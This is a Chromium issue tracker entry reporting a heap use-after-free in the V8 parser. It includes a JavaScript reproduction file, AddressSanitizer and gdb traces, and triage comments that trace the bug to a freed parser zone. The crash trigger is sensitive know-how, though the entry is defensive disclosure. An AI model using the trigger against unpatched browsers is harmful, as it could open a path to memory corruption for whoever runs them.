New issue
Advanced search Search tips
Starred by 2 users
Status: Fixed
Owner:
Closed: Jul 12
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
Security: Use After Free in v8
Reported by june901...@gmail.com, Jul 11 Back to list
VULNERABILITY DETAILS

I'm not sure why this vulnerability occurs.
I guess this vulnerability related with variable allocation and scoping issue
when v8 compiles test.js

This vulnerability occurs in the following conditions:
- define a property with accessor of global scoped object
- define local variables within getter block
- redefine the same object with accessor among variable declarations.


VERSION
v8 5.9.211.31 32/64bit version (asan)
v8 6.1.0 (candidate, current master branch) 64bit version (asan)
I tested in Ubuntu 16.04 64bit.

REPRODUCTION CASE

================ test.js ==================
var proto = {};
Object.defineProperty(proto, 1, {
    get() {
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        Object.defineProperty(proto, 1, { get() {} });
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
        proto = 1;
    }
});

==========================================

$ ~/v8/out/asan/d8 test.js 
=================================================================
==94791==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x563323defddf bp 0x7ffeeb7f7cf0 sp 0x7ffeeb7f7ce8
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x563323defdde  (/home/junekim/v8/out/asan/d8+0x731dde)
    #1 0x563323deb1bf  (/home/junekim/v8/out/asan/d8+0x72d1bf)
    #2 0x563323deb037  (/home/junekim/v8/out/asan/d8+0x72d037)
    #3 0x563323de4d01  (/home/junekim/v8/out/asan/d8+0x726d01)
    #4 0x563323de468a  (/home/junekim/v8/out/asan/d8+0x72668a)
    #5 0x563323fb8b81  (/home/junekim/v8/out/asan/d8+0x8fab81)
    #6 0x563323fcbe27  (/home/junekim/v8/out/asan/d8+0x90de27)
    #7 0x563323fc0df0  (/home/junekim/v8/out/asan/d8+0x902df0)
    #8 0x563323fc64d6  (/home/junekim/v8/out/asan/d8+0x9084d6)
    #9 0x563323ca4af0  (/home/junekim/v8/out/asan/d8+0x5e6af0)
    #10 0x563323ca5bc6  (/home/junekim/v8/out/asan/d8+0x5e7bc6)
    #11 0x563323c3f5c8  (/home/junekim/v8/out/asan/d8+0x5815c8)
    #12 0x563323c3f9ce  (/home/junekim/v8/out/asan/d8+0x5819ce)
    #13 0x563323c51aea  (/home/junekim/v8/out/asan/d8+0x593aea)
    #14 0x563323c56b05  (/home/junekim/v8/out/asan/d8+0x598b05)
    #15 0x563323c5f4be  (/home/junekim/v8/out/asan/d8+0x5a14be)
    #16 0x7f56185a982f  (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

0x6250000143e0 is located 736 bytes inside of 8192-byte region [0x625000014100,0x625000016100)
freed by thread T0 here:
    #0 0x563323c0fb72  (/home/junekim/v8/out/asan/d8+0x551b72)
    #1 0x5633253a9b42  (/home/junekim/v8/out/asan/d8+0x1cebb42)
    #2 0x563324d4beea  (/home/junekim/v8/out/asan/d8+0x168deea)
    #3 0x563324dc38a3  (/home/junekim/v8/out/asan/d8+0x17058a3)
    #4 0x563324db59d7  (/home/junekim/v8/out/asan/d8+0x16f79d7)
    #5 0x563324dae343  (/home/junekim/v8/out/asan/d8+0x16f0343)
    #6 0x563324dd89d0  (/home/junekim/v8/out/asan/d8+0x171a9d0)
    #7 0x563324dd2576  (/home/junekim/v8/out/asan/d8+0x1714576)
    #8 0x563324dcb5c5  (/home/junekim/v8/out/asan/d8+0x170d5c5)
    #9 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #10 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #11 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #12 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #13 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #14 0x563324dd3a9c  (/home/junekim/v8/out/asan/d8+0x1715a9c)
    #15 0x563324dcd260  (/home/junekim/v8/out/asan/d8+0x170f260)
    #16 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #17 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #18 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #19 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #20 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #21 0x563324db7975  (/home/junekim/v8/out/asan/d8+0x16f9975)
    #22 0x563324dec627  (/home/junekim/v8/out/asan/d8+0x172e627)
    #23 0x563324dde9aa  (/home/junekim/v8/out/asan/d8+0x17209aa)
    #24 0x563324daca9c  (/home/junekim/v8/out/asan/d8+0x16eea9c)
    #25 0x563324d3c795  (/home/junekim/v8/out/asan/d8+0x167e795)
    #26 0x563324d3a7e3  (/home/junekim/v8/out/asan/d8+0x167c7e3)
    #27 0x563324e16f8d  (/home/junekim/v8/out/asan/d8+0x1758f8d)
    #28 0x563323fc0f48  (/home/junekim/v8/out/asan/d8+0x902f48)
    #29 0x563323fc64d6  (/home/junekim/v8/out/asan/d8+0x9084d6)

previously allocated by thread T0 here:
    #0 0x563323c0fea3  (/home/junekim/v8/out/asan/d8+0x551ea3)
    #1 0x5633253a9489  (/home/junekim/v8/out/asan/d8+0x1ceb489)
    #2 0x5633253a9e15  (/home/junekim/v8/out/asan/d8+0x1cebe15)
    #3 0x5633253a9c9b  (/home/junekim/v8/out/asan/d8+0x1cebc9b)
    #4 0x563324d28047  (/home/junekim/v8/out/asan/d8+0x166a047)
    #5 0x563324d4aa4f  (/home/junekim/v8/out/asan/d8+0x168ca4f)
    #6 0x563324dc38a3  (/home/junekim/v8/out/asan/d8+0x17058a3)
    #7 0x563324db59d7  (/home/junekim/v8/out/asan/d8+0x16f79d7)
    #8 0x563324dae343  (/home/junekim/v8/out/asan/d8+0x16f0343)
    #9 0x563324dd89d0  (/home/junekim/v8/out/asan/d8+0x171a9d0)
    #10 0x563324dd2576  (/home/junekim/v8/out/asan/d8+0x1714576)
    #11 0x563324dcb5c5  (/home/junekim/v8/out/asan/d8+0x170d5c5)
    #12 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #13 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #14 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #15 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #16 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #17 0x563324dd3a9c  (/home/junekim/v8/out/asan/d8+0x1715a9c)
    #18 0x563324dcd260  (/home/junekim/v8/out/asan/d8+0x170f260)
    #19 0x563324e10dc4  (/home/junekim/v8/out/asan/d8+0x1752dc4)
    #20 0x563324e0ca9a  (/home/junekim/v8/out/asan/d8+0x174ea9a)
    #21 0x563324e0ae81  (/home/junekim/v8/out/asan/d8+0x174ce81)
    #22 0x563324e08247  (/home/junekim/v8/out/asan/d8+0x174a247)
    #23 0x563324d5976c  (/home/junekim/v8/out/asan/d8+0x169b76c)
    #24 0x563324db7975  (/home/junekim/v8/out/asan/d8+0x16f9975)
    #25 0x563324dec627  (/home/junekim/v8/out/asan/d8+0x172e627)
    #26 0x563324dde9aa  (/home/junekim/v8/out/asan/d8+0x17209aa)
    #27 0x563324daca9c  (/home/junekim/v8/out/asan/d8+0x16eea9c)
    #28 0x563324d3c795  (/home/junekim/v8/out/asan/d8+0x167e795)
    #29 0x563324d3a7e3  (/home/junekim/v8/out/asan/d8+0x167c7e3)

SUMMARY: AddressSanitizer: heap-use-after-free (/home/junekim/v8/out/asan/d8+0x731dde) 
Shadow bytes around the buggy address:
  0x0c4a7fffa820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a7fffa870: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
  0x0c4a7fffa880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==94791==ABORTING


 
With out asan, the crash occurs like this:

$ ~/v8/out/x64_release/d8 test.js
Received signal 11 <unknown> 000000000000

==== C stack trace ===============================

 [0x7ff35fe49f14]
 [0x7ff35fa3d390]
 [0x7ff35ee35d49]
 [0x7ff35ee37826]
 [0x7ff35ee34bc9]
 [0x7ff35ee34b38]
 [0x7ff35ee30d9f]
 [0x7ff35ee30a05]
 [0x7ff35ef235e1]
 [0x7ff35ef2b713]
 [0x7ff35ef26e11]
 [0x7ff35ef290c4]
 [0x7ff35ed687ab]
 [0x7ff35ed68e33]
 [0x55903ac2ef1f]
 [0x55903ac2f00c]
 [0x55903ac379d5]
 [0x55903ac397f5]
 [0x55903ac3d8c5]
 [0x7ff35e47f830]
 [0x55903ac2e809]
[end of stack trace]
Segmentation fault (core dumped)

and, the followings are stack trace:
Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
(anonymous namespace)::(anonymous namespace)::Scope::MustAllocate (this=<optimized out>, var=<optimized out>)
    at ../../src/ast/scopes.cc:2085
2085      DCHECK(var->location() != VariableLocation::MODULE);
(gdb) bt
#0  (anonymous namespace)::(anonymous namespace)::Scope::MustAllocate (this=<optimized out>, var=<optimized out>)
    at ../../src/ast/scopes.cc:2085
#1  0x00007ffff6fc5826 in operator() (var=<optimized out>, this=<optimized out>) at ../../src/ast/scopes.cc:2241
#2  (anonymous namespace)::(anonymous namespace)::DeclarationScope::NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2241:25)> (id=(anonymous namespace)::(anonymous namespace)::DeclarationScope::RareVariable::kThisFunction, 
    this=<optimized out>, predicate=...) at ../../src/ast/scopes.h:970
#3  (anonymous namespace)::(anonymous namespace)::DeclarationScope::AllocateLocals (this=<optimized out>)
    at ../../src/ast/scopes.cc:2240
#4  0x00007ffff6fc2bc9 in (anonymous namespace)::(anonymous namespace)::Scope::AllocateNonParameterLocalsAndDeclaredGlobals (this=<optimized out>) at ../../src/ast/scopes.cc:2220
#5  (anonymous namespace)::(anonymous namespace)::Scope::AllocateVariablesRecursively (this=<optimized out>)
    at ../../src/ast/scopes.cc:2283
#6  0x00007ffff6fc2b38 in (anonymous namespace)::(anonymous namespace)::Scope::AllocateVariablesRecursively (
    this=<optimized out>) at ../../src/ast/scopes.cc:2269
#7  0x00007ffff6fbed9f in (anonymous namespace)::(anonymous namespace)::DeclarationScope::AllocateVariables (
    this=<optimized out>, info=<optimized out>, isolate=<optimized out>, mode=<optimized out>)
    at ../../src/ast/scopes.cc:1339
#8  0x00007ffff6fbea05 in (anonymous namespace)::(anonymous namespace)::DeclarationScope::Analyze (
    info=<optimized out>, isolate=<optimized out>, mode=<optimized out>) at ../../src/ast/scopes.cc:671
#9  0x00007ffff70b15e1 in (anonymous namespace)::(anonymous namespace)::Compiler::Analyze (info=<optimized out>, 
    isolate=<optimized out>, eager_literals=<optimized out>) at ../../src/compiler.cc:1202
#10 0x00007ffff70b9713 in (anonymous namespace)::(anonymous namespace)::Compiler::Analyze (
    eager_literals=<optimized out>, info=<optimized out>) at ../../src/compiler.cc:1212
#11 (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::CompileUnoptimizedCode (
    info=<optimized out>, inner_function_mode=<optimized out>) at ../../src/compiler.cc:619
#12 0x00007ffff70b4e11 in (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::CompileToplevel (
    info=<optimized out>) at ../../src/compiler.cc:1162
#13 0x00007ffff70b70c4 in (anonymous namespace)::(anonymous namespace)::Compiler::GetSharedFunctionInfoForScript (
    source=..., script_name=..., line_offset=<optimized out>, column_offset=<optimized out>, resource_options=..., 
    source_map_url=..., context=..., extension=<optimized out>, cached_data=<optimized out>, 
    compile_options=<optimized out>, natives=<optimized out>) at ../../src/compiler.cc:1713
#14 0x00007ffff6ef67ab in (anonymous namespace)::ScriptCompiler::CompileUnboundInternal (v8_isolate=<optimized out>, 
    source=<optimized out>, options=<optimized out>) at ../../src/api.cc:2167
#15 0x00007ffff6ef6e33 in (anonymous namespace)::ScriptCompiler::Compile (context=..., source=<optimized out>, 
    options=<optimized out>) at ../../src/api.cc:2226
#16 0x000055555555ef1f in (anonymous namespace)::Shell::CompileString (isolate=<optimized out>, source=..., 
    name=..., compile_options=<optimized out>) at ../../src/d8.cc:486
#17 0x000055555555f00c in (anonymous namespace)::Shell::ExecuteString (isolate=<optimized out>, source=..., 
    name=..., print_result=<optimized out>, report_exceptions=<optimized out>) at ../../src/d8.cc:522
#18 0x00005555555679d5 in (anonymous namespace)::SourceGroup::Execute (this=<optimized out>, isolate=<optimized out>)
    at ../../src/d8.cc:2206
#19 0x00005555555697f5 in (anonymous namespace)::Shell::RunMain (isolate=<optimized out>, argc=<optimized out>, 
    argv=<optimized out>, last_run=<optimized out>) at ../../src/d8.cc:2632
#20 0x000055555556d8c5 in (anonymous namespace)::Shell::Main (argc=<optimized out>, argv=<optimized out>)
    at ../../src/d8.cc:3115
#21 0x00007ffff660d830 in __libc_start_main (main=0x55555556db50 <main(int, char**)>, argc=2, argv=0x7fffffffe598, 
    init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe588)
    at ../csu/libc-start.c:291
#22 0x000055555555e809 in _start ()


I forgot changing a title before submission, sorry :-(
Components: Blink>JavaScript
Labels: Security_Severity-High Security_Impact-Stable OS-All Pri-1
Status: Available
Summary: Security: Use After Free in v8 (was: Security: Use After Free )
Hopefully the v8 sheriff can help triage. Tentatively marking high severity.
Cc: bmeu...@chromium.org mlippautz@chromium.org petermarshall@chromium.org
adding memory sheriffs and compiler folks to the thread. Any clue whats going on?
Project Member Comment 5 by sheriffbot@chromium.org, Jul 11
Labels: M-59
Owner: mlippautz@chromium.org
Status: Assigned
Assigning to mlippautz@ to triage further. Please re-assign as needed.
Cc: -petermarshall@chromium.org
Owner: petermarshall@chromium.org
Assigning to memory sheriff. https://rotation.googleplex.com/index.html#rotation?id=4838401396178944

Pleas have a look.
Cc: petermarshall@chromium.org
Owner: adamk@chromium.org
It looks like the zone was deleted after ParseFunctionLiteral and then later used under DeclarationScope::Analyze, could you please take a look?


out/x64.release/d8 ~/test.js 
=================================================================
==37066==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x555cd04600e0 bp 0x7ffce956a870 sp 0x7ffce956a868
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x555cd04600df in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)> src/ast/scopes.h:1018:9
    #1 0x555cd04600df in v8::internal::DeclarationScope::AllocateLocals() src/ast/scopes.cc:2260
    #2 0x555cd045b3ee in AllocateNonParameterLocalsAndDeclaredGlobals src/ast/scopes.cc:2240:27
    #3 0x555cd045b3ee in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2304
    #4 0x555cd045b267 in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2290:12
    #5 0x555cd0453ed2 in v8::internal::DeclarationScope::AllocateVariables(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:1337:3
    #6 0x555cd0453916 in v8::internal::DeclarationScope::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:673:10
    #7 0x555cd0611f5b in v8::internal::Compiler::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::ThreadedList<v8::internal::ThreadedListZoneEntry<v8::internal::FunctionLiteral*> >*) src/compiler.cc:1133:3
    #8 0x555cd06244e7 in Analyze src/compiler.cc:1143:10
    #9 0x555cd06244e7 in v8::internal::(anonymous namespace)::CompileUnoptimizedCode(v8::internal::CompilationInfo*, v8::internal::ConcurrencyMode) src/compiler.cc:552
    #10 0x555cd0619984 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1098:10
    #11 0x555cd061dd80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14
    #12 0x555cd034d543 in v8::ScriptCompiler::CompileUnboundInternal(v8::Isolate*, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2241:14
    #13 0x555cd034eac6 in v8::ScriptCompiler::Compile(v8::Local<v8::Context>, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2300:16
    #14 0x555cd02ec7d8 in v8::Shell::CompileString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, v8::ScriptCompiler::CompileOptions) src/d8.cc:536:12
    #15 0x555cd02ecbdb in v8::Shell::ExecuteString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, bool, bool) src/d8.cc:572:10
    #16 0x555cd0301883 in v8::SourceGroup::Execute(v8::Isolate*) src/d8.cc:2344:10
    #17 0x555cd0307f76 in v8::Shell::RunMain(v8::Isolate*, int, char**, bool) src/d8.cc:2774:34
    #18 0x555cd030b5c0 in v8::Shell::Main(int, char**) src/d8.cc:3224:16
    #19 0x7f8d6dfb4f44 in __libc_start_main /build/eglibc-SvCtMH/eglibc-2.19/csu/libc-start.c:287

0x6250000143e0 is located 736 bytes inside of 8192-byte region [0x625000014100,0x625000016100)
freed by thread T0 here:
    #0 0x555cd02bd532 in __interceptor_free (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f532)
    #1 0x555cd18c706e in DeleteAll src/zone/zone.cc:104:17
    #2 0x555cd18c706e in v8::internal::Zone::~Zone() src/zone/zone.cc:60
    #3 0x555cd1255e6b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2802:3
    #4 0x555cd12c9be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #5 0x555cd12bc27a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #6 0x555cd12b4a5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #7 0x555cd12dfae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #8 0x555cd12d8936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #9 0x555cd12d1616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #10 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #11 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #12 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #13 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #14 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #15 0x555cd12d9e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #16 0x555cd12d31cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #17 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #18 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #19 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #20 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #21 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #22 0x555cd12be295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #23 0x555cd12f48c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #24 0x555cd12f48c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #25 0x555cd12e59bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #26 0x555cd12b303e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #27 0x555cd1245fec in ParseStatementList src/parsing/parser-base.h:1263:32
    #28 0x555cd1245fec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #29 0x555cd124496b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14
    #30 0x555cd131fcb2 in v8::internal::parsing::ParseProgram(v8::internal::ParseInfo*, v8::internal::Isolate*, bool) src/parsing/parsing.cc:29:19
    #31 0x555cd0619ae2 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1064:12
    #32 0x555cd061dd80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14

previously allocated by thread T0 here:
    #0 0x555cd02bd873 in __interceptor_malloc (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f873)
    #1 0x555cd18c69b9 in AllocateSegment src/zone/accounting-allocator.cc:85:18
    #2 0x555cd18c69b9 in v8::internal::AccountingAllocator::GetSegment(unsigned long) src/zone/accounting-allocator.cc:75
    #3 0x555cd18c7345 in NewSegment src/zone/zone.cc:116:33
    #4 0x555cd18c7345 in v8::internal::Zone::NewExpand(unsigned long) src/zone/zone.cc:164
    #5 0x555cd18c71cb in v8::internal::Zone::New(unsigned long) src/zone/zone.cc:79:14
    #6 0x555cd1232027 in New src/zone/zone.h:139:43
    #7 0x555cd1232027 in NewData src/list.h:183
    #8 0x555cd1232027 in Initialize src/list.h:172
    #9 0x555cd1232027 in List src/list.h:39
    #10 0x555cd1232027 in ZoneList src/zone/zone.h:157
    #11 0x555cd1232027 in v8::internal::FuncNameInferrer::FuncNameInferrer(v8::internal::AstValueFactory*, v8::internal::Zone*) src/parsing/func-name-inferrer.cc:18
    #12 0x555cd1254c1b in DiscardableZoneScope src/parsing/parser.cc:114:9
    #13 0x555cd1254c1b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2712
    #14 0x555cd12c9be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #15 0x555cd12bc27a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #16 0x555cd12b4a5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #17 0x555cd12dfae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #18 0x555cd12d8936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #19 0x555cd12d1616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #20 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
